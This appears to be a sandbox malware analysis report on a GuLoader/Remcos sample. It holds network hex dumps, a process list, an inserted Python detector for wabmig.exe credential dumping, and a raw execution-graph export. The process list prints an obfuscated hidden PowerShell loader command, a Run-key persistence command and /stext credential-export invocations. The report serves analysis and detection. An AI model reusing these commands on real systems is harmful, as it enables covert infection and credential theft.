                                                                          Timestamp: 2024-10-07 22:40:24 UTC | Bytes transferred: 16384 | Direction: IN | Data Raw: 6a ed ec 93 97 a1 b2 30 9b 32 35 96 23 40 50 8f b9 ec e2 61 51 69 05 6c ff d1 1b 56 dd 4b bf 1b 35 20 a9 36 1c da 6e 69 1d 86 54 51 b1 ae 2a c8 86 c7 fe 12 f1 2f ca f4 ac 11 49 25 83 79 29 b5 56 f0 e3 1d 1f ab e2 ac 22 f6 ef bf a4 4d 94 4f 9a 85 72 85 7d af 39 ac cf df 80 8b 72 bd 81 87 d3 0c 64 d9 3e fa 4c a5 08 33 46 f2 ec 92 63 1a 2a 45 0a 8c 3f b8 7c be e5 55 44 2e 71 96 84 3f 9d 38 bb cf ab 73 50 93 bb 97 02 74 94 41 d1 5b 9d 13 1d 85 17 97 86 f3 fc 07 d7 6d d9 76 6e 60 1e 87 e1 e0 32 c7 ee 8a e8 2c 9f ca 12 42 e4 fa b5 89 50 29 80 58 a6 75 d7 06 11 3a d6 ff 0e 46 c5 c9 2b cd 58 be 67 fe a7 e5 b3 ec 37 ba 27 7a d6 30 c6 a1 9e 6a f6 14 79 d9 3f 16 2d 12 cd 1b 6e c9 1e 06 46 98 77 58 d0 b9 8f 1b 91 da c2 74 a1 19 cf 71 f7 86 6d 0d 37 e4 e9 b2 be 60 82
                                                                          Data Ascii: j025#@PaQilVK5 6niTQ*/I%y)V"MOr}9rd>L3Fc*E?|UD.q?8sPtA[mvn`2,BP)Xu:F+Xg7'z0jy?-nFwXtqm7`
                                                                          Timestamp: 2024-10-07 22:40:24 UTC | Bytes transferred: 16384 | Direction: IN | Data Raw: a4 c5 80 e0 02 e2 45 1c fd 2d 43 b7 a4 e9 7e b7 2e a3 f4 d4 7c 35 cf bc cb 74 fa be e6 6e aa ce 22 2f 84 77 2a fb e0 83 52 ea 93 d0 44 ec 59 5e 34 7f 8d 26 bc 89 29 5c 8b b8 ac b7 a4 09 64 0e 4f 39 4f 80 7d 2e 01 e2 dc 80 52 bc 55 14 bd eb ef 0a 28 2b bc a3 a4 d7 09 76 58 f8 7f 70 94 77 5e 96 45 88 8e 7c 64 b5 21 c8 5b 68 c5 f0 94 0b 65 89 6e 10 fc f1 c3 7b 26 1d 35 6f 9b f9 c7 e0 28 b1 52 43 e1 6b 9f 3c 7e 7f 03 c1 69 80 de b2 37 31 5e d9 44 a3 61 c5 b5 98 da 94 48 56 33 a9 4b a0 7f 1f a5 37 f0 ab 57 20 e1 90 78 10 28 df 4b cf 22 52 42 22 4e 74 b3 3b 94 62 ab c5 8b d7 ea 46 cf 1a 67 82 f4 f5 0e 4b e4 a3 7a 95 1c c6 c6 b7 f5 d1 a8 7b c0 cf 78 29 74 b2 a8 89 d3 1d 4a 86 f6 76 8d 34 ca 10 4d 43 92 ce f8 24 4f 04 d2 ec b8 19 53 24 aa d9 1f 94 63 8e d4 7d 9f
                                                                          Data Ascii: E-C~.|5tn"/w*RDY^4&)\dO9O}.RU(+vXpw^E|d![hen{&5o(RCk<~i71^DaHV3K7W x(K"RB"Nt;bFgKz{x)tJv4MC$OS$c}
                                                                          Timestamp: 2024-10-07 22:40:24 UTC | Bytes transferred: 16384 | Direction: IN | Data Raw: d7 47 b6 bf 09 cc 3b 04 48 39 5f 53 98 0a de 1a 0f c1 51 89 32 d6 9e 2b 9f 71 f9 e9 b2 69 de 8b b6 ee 20 6b c4 3c da 21 b2 73 31 71 2f 7c b8 ec 1c f6 3d 44 73 48 98 d7 68 94 22 52 e3 f6 86 fa 40 6f e9 96 d8 b5 94 c0 68 88 47 70 77 bd 58 1a 1e ee 51 ee a8 f0 61 ce 7b af b1 72 ab 42 e4 cc 0d 91 cc d3 38 10 0e 80 a5 68 cd 4c 6b db 11 e0 c3 eb 18 11 e1 25 d6 be 27 3c 07 2b b3 ac 99 0f 2c 8f 41 41 e7 79 01 54 9f 82 7e 8f eb 7f ad b0 9c a1 ac 3e 28 4e 0e 77 98 67 60 af 89 55 fa f7 33 3e 96 d0 72 eb 19 92 2e b6 2c cb 8e 27 18 73 61 56 c9 2e d9 fc db 35 f6 dc 56 57 c0 11 52 a6 ee 09 3a 0e cf 47 b9 d0 be e1 be 58 7a 94 45 e5 10 44 79 8a 6a 3d 37 93 88 1e 1a 08 6c 66 e4 34 5d a8 f1 fa 37 22 a4 e0 a3 8d 11 94 5f 54 08 9d 42 16 14 d5 53 89 43 d1 9a a6 71 fa b6 bf 75
                                                                          Data Ascii: G;H9_SQ2+qi k<!s1q/|=DsHh"R@ohGpwXQa{rB8hLk%'<+,AAyT~>(Nwg`U3>r.,'saV.5VWR:GXzEDyj=7lf4]7"_TBSCqu
                                                                          Timestamp: 2024-10-07 22:40:24 UTC | Bytes transferred: 16384 | Direction: IN | Data Raw: 49 3e b1 cd 4f d3 6a 74 9b ad ad 0e 11 6a ef 1b 4c 6d 07 e5 a4 6d ad 71 92 88 f1 e1 4d 77 41 6b 90 40 85 7e 89 10 1c 3c f9 75 9e 9e 11 63 a5 bb 35 15 28 5a c7 31 9e 85 8a ae 45 40 31 08 1c 8b ae 0a 33 6c a5 1b 96 31 b5 5c ff 39 46 aa 59 1d ad 77 57 35 38 fa 82 10 ef 1d df 87 2c 6b 05 29 67 9f 0c de 02 91 72 e0 ab dd 0b e0 ab 74 f8 bc 7e 50 9d e5 6a 67 69 db de c7 09 d3 9e 60 1e d4 14 4c f4 4b 14 a9 be a7 b0 ab 8b d0 79 d8 e4 99 cf 5b d1 2c 66 2e a3 6c 68 ef bd b9 c2 2f f5 a9 7e 9b 3e 89 2b fe 1c b5 05 64 e1 80 36 7c 21 64 b3 5f 1b 93 a8 5d 42 f5 48 2a aa b4 e6 35 9b 4e f6 10 e4 f3 0f b9 f3 de 2f 73 e1 b3 89 05 9c 67 4b 60 31 60 18 62 3a 16 87 15 28 99 fd ed 66 9e 89 4f 72 25 bc 84 78 45 b0 e7 48 f4 9d 90 8f 9c a9 e3 36 05 6f 1a 2e be b7 d6 da 4d 07 0f dc
                                                                          Data Ascii: I>OjtjLmmqMwAk@~<uc5(Z1E@13l1\9FYwW58,k)grt~Pjgi`LKy[,f.lh/~>+d6|!d_]BH*5N/sgK`1`b:(fOr%xEH6o.M
                                                                          Timestamp: 2024-10-07 22:40:24 UTC | Bytes transferred: 16384 | Direction: IN | Data Raw: b5 3b b6 8c 25 f1 4a d5 66 1f 24 eb 8a b4 a8 e6 22 32 e6 37 cd 6b 2f 6a ac 8e 50 de 59 3c a2 21 38 81 a3 a8 a4 67 24 d2 63 e0 27 7a bd 40 ac ad 1f fb 08 b4 14 75 69 bb bb 18 2f bd 4a a6 84 de 92 f1 4a 3b 11 aa 19 25 33 37 0b 2c 88 94 eb 56 c7 19 3c 50 90 cf 6c 51 92 cf db 75 50 0f 11 50 12 1d 1f d3 4c 20 ce 3a 9b d6 55 b1 e3 09 08 a6 f8 ba e0 69 61 19 1d 9a a7 79 1a 00 10 c4 3e 0b 82 b5 76 c7 42 e1 ab 4b 3d 72 1d c2 4e 67 ea 20 19 3d c4 f8 7a a1 0d b2 be 03 20 ea 1a 27 83 90 d1 9c 04 3a a5 81 21 f7 cc c8 4e 2c c9 f6 06 bd 39 10 27 9e c2 29 cc 00 f6 5e 0d a2 5c ce 34 72 c8 96 96 06 da ce 3a 32 11 57 79 2c 02 e9 da 3d 4c 27 e6 0f db 1d 0c 44 f4 19 bb be 2f b5 9f f4 dd e2 a1 32 7e 5a c7 ea 7a 1a 59 d3 4f d1 c1 d5 61 29 40 19 19 3b fa 4c 1e 1c 89 ec 84 20 75
                                                                          Data Ascii: ;%Jf$"27k/jPY<!8g$c'z@ui/JJ;%37,V<PlQuPPL :Uiay>vBK=rNg =z ':!N,9')^\4r:2Wy,=L'D/2~ZzYOa)@;L u
                                                                          Timestamp: 2024-10-07 22:40:24 UTC | Bytes transferred: 16384 | Direction: IN | Data Raw: 8d 93 94 c0 95 75 87 6c b4 7f 96 ce 9e 42 db 74 6d 4f ab 78 c1 05 4a e9 48 1e 1a 0d 46 49 8b da 77 dd 60 17 a2 43 06 92 3e 4a ac 4a 39 96 0f 70 e0 61 28 c2 28 10 80 0c b5 cb 7e 4f 11 d4 7a 6b 1f 80 72 67 84 5f 95 0e d1 81 53 a3 94 0f 59 a9 98 88 b1 08 a4 f7 b0 d1 3a 4c 02 7d 58 cf 98 0f bd 76 25 ab 64 df 70 09 9c 6c 11 50 86 ff f0 de c6 c9 64 5f bc 04 91 8a a3 a8 05 6e e0 ee 32 e6 3e ad 7e 57 b4 2d 8d 6c 45 69 4e e5 eb 4c c2 58 3c 51 86 22 42 97 35 89 0b c9 0a 5a f0 1e c2 9c 07 42 b3 2d b8 56 85 cd 62 28 d6 66 ea 57 c1 09 85 89 cf cc 85 96 bc 26 94 45 b5 ef 5d 8d 6d 3a 9b bd f4 11 f1 91 52 5d 9f b8 a0 e0 9d 52 88 f1 55 34 56 9a 6d 5a b3 9d ce 40 28 96 43 e6 3e 04 69 41 1a 8f 2c 55 d8 de bd 9e 08 ea 92 84 a6 5a 45 28 5c 26 1b 12 3a 5c 1e c7 da 39 98 68 97
                                                                          Data Ascii: ulBtmOxJHFIw`C>JJ9pa((~Ozkrg_SY:L}Xv%dplPd_n2>~W-lEiNLX<Q"B5ZB-Vb(fW&E]m:R]RU4VmZ@(C>iA,UZE(\&:\9h
                                                                          Timestamp: 2024-10-07 22:40:25 UTC | Bytes transferred: 16384 | Direction: IN | Data Raw: 95 94 e4 e5 01 ed aa 37 05 eb 1e 18 bd c5 6a 03 81 75 0a d5 83 c1 73 d5 8f 66 3e 23 6a b0 60 03 41 f8 a2 7b 37 4a 92 7f 8f e3 cf 0a 81 b4 4f 60 8b 77 5e c6 a9 5e ae 90 3e 2d 8b 84 4f c0 c8 25 44 43 e4 ab 8b 49 3d 7b 91 68 52 95 95 ef 48 24 85 fe cf 8b d6 06 e7 66 fd 20 6a 39 25 63 3a 3e 6c 5a cb 54 d3 cd a4 f4 8c 9a e0 de 09 73 a3 c7 37 1a 6f a3 7c ce f1 1d a3 b4 71 5c 72 9f cb 9f c4 01 e5 2e 34 89 2a b3 45 a6 39 1d 00 9b 3b c3 3e 95 58 ac 8f 9b 2f ca 42 b4 c3 ce 8a 1f 42 67 4b 98 07 e2 17 e4 bc 37 a9 84 34 80 00 82 eb 37 2d f2 12 7f d0 08 76 c3 fd 5f 42 11 e9 4f 35 77 9e 0d 84 a6 7c f7 09 32 9c a9 a5 1e ca d6 8a cd e6 d8 28 fb 49 24 e6 53 3b ee 13 60 2b 55 73 f9 98 19 ce fe 11 c0 8d b0 0c 23 ae 3e 26 a8 da 7d 9e 81 6b 49 db 36 8c c9 0a a1 68 97 be 70 cb
                                                                          Data Ascii: 7jusf>#j`A{7JO`w^^>-O%DCI={hRH$f j9%c:>lZTs7o|q\r.4*E9;>X/BBgK747-v_BO5w|2(I$S;`+Us#>&}kI6hp



                                                                          Target ID:5
                                                                          Start time:18:38:32
                                                                          Start date:07/10/2024
                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe"
                                                                          Imagebase:0x400000
                                                                          File size:648'112 bytes
                                                                          MD5 hash:84E09BF944042FBD418724CDDB729516
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:7
                                                                          Start time:18:38:33
                                                                          Start date:07/10/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)"
                                                                          Imagebase:0xd90000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2408058471.000000000C4AF000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:8
                                                                          Start time:18:38:33
                                                                          Start date:07/10/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff620390000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:12
                                                                          Start time:18:40:03
                                                                          Start date:07/10/2024
                                                                          Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe"
                                                                          Imagebase:0x610000
                                                                          File size:66'048 bytes
                                                                          MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000003.2460189386.000000000772A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000003.2423083446.000000000772A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          Target ID:13
                                                                          Start time:18:40:20
                                                                          Start date:07/10/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"
                                                                          Imagebase:0xd70000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:14
                                                                          Start time:18:40:20
                                                                          Start date:07/10/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff620390000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:15
                                                                          Start time:18:40:20
                                                                          Start date:07/10/2024
                                                                          Path:C:\Windows\SysWOW64\reg.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"
                                                                          Imagebase:0x900000
                                                                          File size:59'392 bytes
                                                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:17
                                                                          Start time:18:40:27
                                                                          Start date:07/10/2024
                                                                          Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\coqd"
                                                                          Imagebase:0x610000
                                                                          File size:66'048 bytes
                                                                          MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:18
                                                                          Start time:18:40:27
Start date:07/10/2024
Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\nivooon"
Imagebase:0x610000
File size:66'048 bytes
MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:19
Start time:18:40:27
Start date:07/10/2024
Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\xkahpgyvtl"
Imagebase:0x610000
File size:66'048 bytes
MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

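The two wabmig.exe launches above are worth reading carefully: the image is the stock Windows Mail/Contacts helper (same MD5 in both runs, moderate reputation), but it is started with /stext and a random-looking file name under the user's Temp directory. That is the credential-dump pattern Remcos is known for: a NirSoft-style recovery tool (WebBrowserPassView, Mail PassView) is injected into the trusted binary and told to write what it recovers to a file the RAT then reads and exfiltrates. Because the file on disk is the clean Microsoft binary, hash-based blocking does nothing; the command line and the parent process are the signal. The following Python is an added example, not code from the Joe Sandbox report, that scores process-creation events on that pattern. The event layout (Image, CommandLine, ParentImage keys), the parent paths, and the third, fourth and fifth events are constructed; the two wabmig.exe command lines are the ones shown above, and the export switches other than /stext are an assumption about the injected tool, matching the switch set the real NirSoft tools expose.

```python
"""Flag Windows Mail helper binaries driven as credential dumpers.

Added example, not code from the Joe Sandbox report. Remcos is known to inject
NirSoft-style recovery tools (WebBrowserPassView, Mail PassView) into the
legitimate wab.exe / wabmig.exe and run them with an export switch such as
/stext, writing the harvested credentials to a random-looking file in the
user's Temp directory. The binary on disk is the clean Microsoft file, so the
command line, not the image hash, is the signal.
"""
import re
from pathlib import PureWindowsPath
from typing import Dict, List, Optional

# /stext is what the report shows; the other switches are the same export
# family the NirSoft tools expose (assumption about the injected tool).
EXPORT_SWITCHES = {"/stext", "/scomma", "/stab", "/shtml", "/sverhtml", "/sxml"}
TARGET_IMAGES = {"wab.exe", "wabmig.exe"}
TEMP_RE = re.compile(r"\\appdata\\local\\temp\\", re.IGNORECASE)


def split_cmdline(cmdline: str) -> List[str]:
    """Minimal Windows command-line tokenizer: whitespace separates arguments,
    double quotes group (and are stripped). Enough for the /stext <path> form."""
    tokens: List[str] = []
    cur: List[str] = []
    in_quotes = False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def classify(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return an alert dict for one process-creation event, or None if benign.

    Expected keys (Sysmon-like, constructed for this example): Image,
    CommandLine, ParentImage.
    """
    image = PureWindowsPath(event["Image"]).name.lower()
    if image not in TARGET_IMAGES:
        return None
    argv = split_cmdline(event["CommandLine"])
    # Look for an export switch anywhere after argv[0]; the next token is the
    # file the tool will write the recovered credentials to.
    for i in range(1, len(argv)):
        switch = argv[i].lower()
        if switch in EXPORT_SWITCHES:
            out_path = argv[i + 1] if i + 1 < len(argv) else None
            reasons = [f"{image} invoked with credential-export switch {switch}"]
            if out_path and TEMP_RE.search(out_path):
                reasons.append("export file is under %LOCALAPPDATA%\\Temp")
            return {
                "image": image,
                "switch": switch,
                "output": out_path,
                "parent": PureWindowsPath(event.get("ParentImage", "")).name.lower(),
                "reasons": reasons,
            }
    return None


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run classify() over a batch of events and keep only the alerts."""
    return [a for a in (classify(e) for e in events) if a is not None]


# Constructed sample events. The first two command lines are the ones the
# report shows for wabmig.exe; parent images and the other events are made up.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Program Files (x86)\Windows Mail\wabmig.exe",
     "CommandLine": r'"C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\nivooon"',
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\dropper.exe"},
    {"Image": r"C:\Program Files (x86)\Windows Mail\wabmig.exe",
     "CommandLine": r'"C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\xkahpgyvtl"',
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\dropper.exe"},
    {"Image": r"C:\Program Files (x86)\Windows Mail\wab.exe",
     "CommandLine": r'"C:\Program Files (x86)\Windows Mail\wab.exe" /scomma "C:\Users\user\Documents\out.csv"',
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\dropper.exe"},
    # Benign: the user opened the Contacts helper from the shell, no export switch.
    {"Image": r"C:\Program Files (x86)\Windows Mail\wabmig.exe",
     "CommandLine": r'"C:\Program Files (x86)\Windows Mail\wabmig.exe"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    # Not a target image, even though the argument looks the same.
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r'notepad.exe /stext "C:\Users\user\Desktop\notes.txt"',
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"{alert['parent']} -> {alert['image']} {alert['switch']} {alert['output']}")
        for reason in alert["reasons"]:
            print("   ", reason)
```

In a real pipeline the parent-image check should be tightened to whatever launches these helpers legitimately in your environment (typically the shell or the mail client), since the injected copy is started by the malware's own process, and the output file named after /stext should be collected before the RAT deletes it.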
Execution Graph

Execution Coverage:24.8%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:21.4%
Total number of Nodes:1326
Total number of Limit Nodes:47

[Execution graph: the report's node/edge export (node id, code address, API name, id->id edges) is drawn as a graph in the interactive view and does not survive as readable text. What can be recovered from the export: all nodes lie in the 0x401000-0x4071xx range of the sample's own image, consistent with the 0% dynamic/decrypted code coverage (the decrypted stage is not covered by this graph), and the API nodes it names include CreateProcessW, ShellExecuteExW, WaitForSingleObject/GetExitCodeProcess, LoadLibraryExW/GetProcAddress, RegCreateKeyExW/RegSetValueExW/RegQueryValueExW/RegDeleteKeyW/RegDeleteValueW, FindFirstFileW/FindNextFileW, DeleteFileW/MoveFileExW/SetFileAttributesW/SetFileSecurityW, GetPrivateProfileStringW/WritePrivateProfileStringW, CoCreateInstance, SHFileOperationW, SHBrowseForFolderW, OpenClipboard/SetClipboardData, MultiByteToWideChar/WideCharToMultiByte and MessageBoxIndirectW.]
calls 4614->4616 4615->4588 4624 404890 4616->4624 4618 404810 lstrcmpiW 4617->4618 4618->4613 4621 404821 lstrcatW 4618->4621 4619 4048d1 4646 40624c lstrcpynW 4619->4646 4621->4613 4622 4048d8 4623 405bc8 4 API calls 4622->4623 4625 4048de GetDiskFreeSpaceW 4623->4625 4624->4619 4628 405b69 2 API calls 4624->4628 4630 404929 4624->4630 4627 404902 MulDiv 4625->4627 4625->4630 4627->4630 4628->4624 4629 40499a 4632 4049bd 4629->4632 4634 40140b 2 API calls 4629->4634 4630->4629 4631 404b35 20 API calls 4630->4631 4633 404987 4631->4633 4647 404203 KiUserCallbackDispatcher 4632->4647 4636 40499c SetDlgItemTextW 4633->4636 4637 40498c 4633->4637 4634->4632 4636->4629 4639 404a6c 20 API calls 4637->4639 4638 4049d9 4638->4640 4641 404609 SendMessageW 4638->4641 4639->4629 4640->4592 4641->4640 4642->4586 4643->4612 4644->4596 4645->4614 4646->4622 4647->4638 4653 401db3 GetDC 4654 402c15 17 API calls 4653->4654 4655 401dc5 GetDeviceCaps MulDiv ReleaseDC 4654->4655 4656 402c15 17 API calls 4655->4656 4657 401df6 4656->4657 4658 40626e 17 API calls 4657->4658 4659 401e33 CreateFontIndirectW 4658->4659 4660 40258c 4659->4660 4661 401735 4662 402c37 17 API calls 4661->4662 4663 40173c SearchPathW 4662->4663 4664 401757 4663->4664 4665 402835 4666 40283d 4665->4666 4667 402841 FindNextFileW 4666->4667 4668 402853 4666->4668 4667->4668 4669 40289a 4667->4669 4671 40624c lstrcpynW 4669->4671 4671->4668 4672 4014b8 4673 4014be 4672->4673 4674 401389 2 API calls 4673->4674 4675 4014c6 4674->4675 4676 402ab8 InvalidateRect 4677 402abf 4676->4677 3780 40333d SetErrorMode GetVersion 3781 40337c 3780->3781 3782 403382 3780->3782 3783 406626 5 API calls 3781->3783 3784 4065b6 3 API calls 3782->3784 3783->3782 3785 403398 lstrlenA 3784->3785 3785->3782 3786 4033a8 3785->3786 3787 406626 5 API calls 3786->3787 3788 4033af 3787->3788 3789 406626 5 API calls 3788->3789 3790 4033b6 3789->3790 3791 406626 5 API calls 3790->3791 3792 4033c2 #17 OleInitialize SHGetFileInfoW 3791->3792 
3871 40624c lstrcpynW 3792->3871 3795 40340e GetCommandLineW 3872 40624c lstrcpynW 3795->3872 3797 403420 GetModuleHandleW 3798 403438 3797->3798 3799 405b4a CharNextW 3798->3799 3800 403447 CharNextW 3799->3800 3801 403571 GetTempPathW 3800->3801 3811 403460 3800->3811 3873 40330c 3801->3873 3803 403589 3804 4035e3 DeleteFileW 3803->3804 3805 40358d GetWindowsDirectoryW lstrcatW 3803->3805 3883 402ec1 GetTickCount GetModuleFileNameW 3804->3883 3806 40330c 12 API calls 3805->3806 3809 4035a9 3806->3809 3807 405b4a CharNextW 3807->3811 3809->3804 3812 4035ad GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3809->3812 3810 4035f7 3818 405b4a CharNextW 3810->3818 3855 40369a 3810->3855 3866 4036aa 3810->3866 3811->3807 3814 40355c 3811->3814 3816 40355a 3811->3816 3815 40330c 12 API calls 3812->3815 3967 40624c lstrcpynW 3814->3967 3821 4035db 3815->3821 3816->3801 3822 403616 3818->3822 3821->3804 3821->3866 3829 403674 3822->3829 3830 4036da 3822->3830 3823 4037e4 3826 403868 ExitProcess 3823->3826 3827 4037ec GetCurrentProcess OpenProcessToken 3823->3827 3824 4036c4 3825 4058ae MessageBoxIndirectW 3824->3825 3831 4036d2 ExitProcess 3825->3831 3832 403804 LookupPrivilegeValueW AdjustTokenPrivileges 3827->3832 3833 403838 3827->3833 3834 405c25 18 API calls 3829->3834 3835 405819 5 API calls 3830->3835 3832->3833 3836 406626 5 API calls 3833->3836 3837 403680 3834->3837 3838 4036df lstrcatW 3835->3838 3839 40383f 3836->3839 3837->3866 3968 40624c lstrcpynW 3837->3968 3841 4036f0 lstrcatW 3838->3841 3842 4036fb lstrcatW lstrcmpiW 3838->3842 3840 403854 ExitWindowsEx 3839->3840 3843 403861 3839->3843 3840->3826 3840->3843 3841->3842 3845 403717 3842->3845 3842->3866 3846 40140b 2 API calls 3843->3846 3848 403723 3845->3848 3849 40371c 3845->3849 3846->3826 3847 40368f 3969 40624c lstrcpynW 3847->3969 3851 4057fc 2 API calls 3848->3851 3850 40577f 4 API calls 3849->3850 3853 403721 3850->3853 3854 403728 SetCurrentDirectoryW 3851->3854 3853->3854 
3856 403743 3854->3856 3857 403738 3854->3857 3911 40395a 3855->3911 3978 40624c lstrcpynW 3856->3978 3977 40624c lstrcpynW 3857->3977 3860 40626e 17 API calls 3861 403782 DeleteFileW 3860->3861 3862 40378f CopyFileW 3861->3862 3868 403751 3861->3868 3862->3868 3863 4037d8 3864 406012 36 API calls 3863->3864 3864->3866 3865 406012 36 API calls 3865->3868 3970 403880 3866->3970 3867 40626e 17 API calls 3867->3868 3868->3860 3868->3863 3868->3865 3868->3867 3869 405831 2 API calls 3868->3869 3870 4037c3 CloseHandle 3868->3870 3869->3868 3870->3868 3871->3795 3872->3797 3874 4064e0 5 API calls 3873->3874 3876 403318 3874->3876 3875 403322 3875->3803 3876->3875 3877 405b1d 3 API calls 3876->3877 3878 40332a 3877->3878 3879 4057fc 2 API calls 3878->3879 3880 403330 3879->3880 3979 405d6d 3880->3979 3983 405d3e GetFileAttributesW CreateFileW 3883->3983 3885 402f01 3886 402f11 3885->3886 3984 40624c lstrcpynW 3885->3984 3886->3810 3888 402f27 3889 405b69 2 API calls 3888->3889 3890 402f2d 3889->3890 3985 40624c lstrcpynW 3890->3985 3892 402f38 GetFileSize 3893 402f4f 3892->3893 3908 403034 3892->3908 3893->3886 3896 4032df ReadFile 3893->3896 3898 4030a0 3893->3898 3906 402e5d 6 API calls 3893->3906 3893->3908 3895 40303d 3895->3886 3897 40306d GlobalAlloc 3895->3897 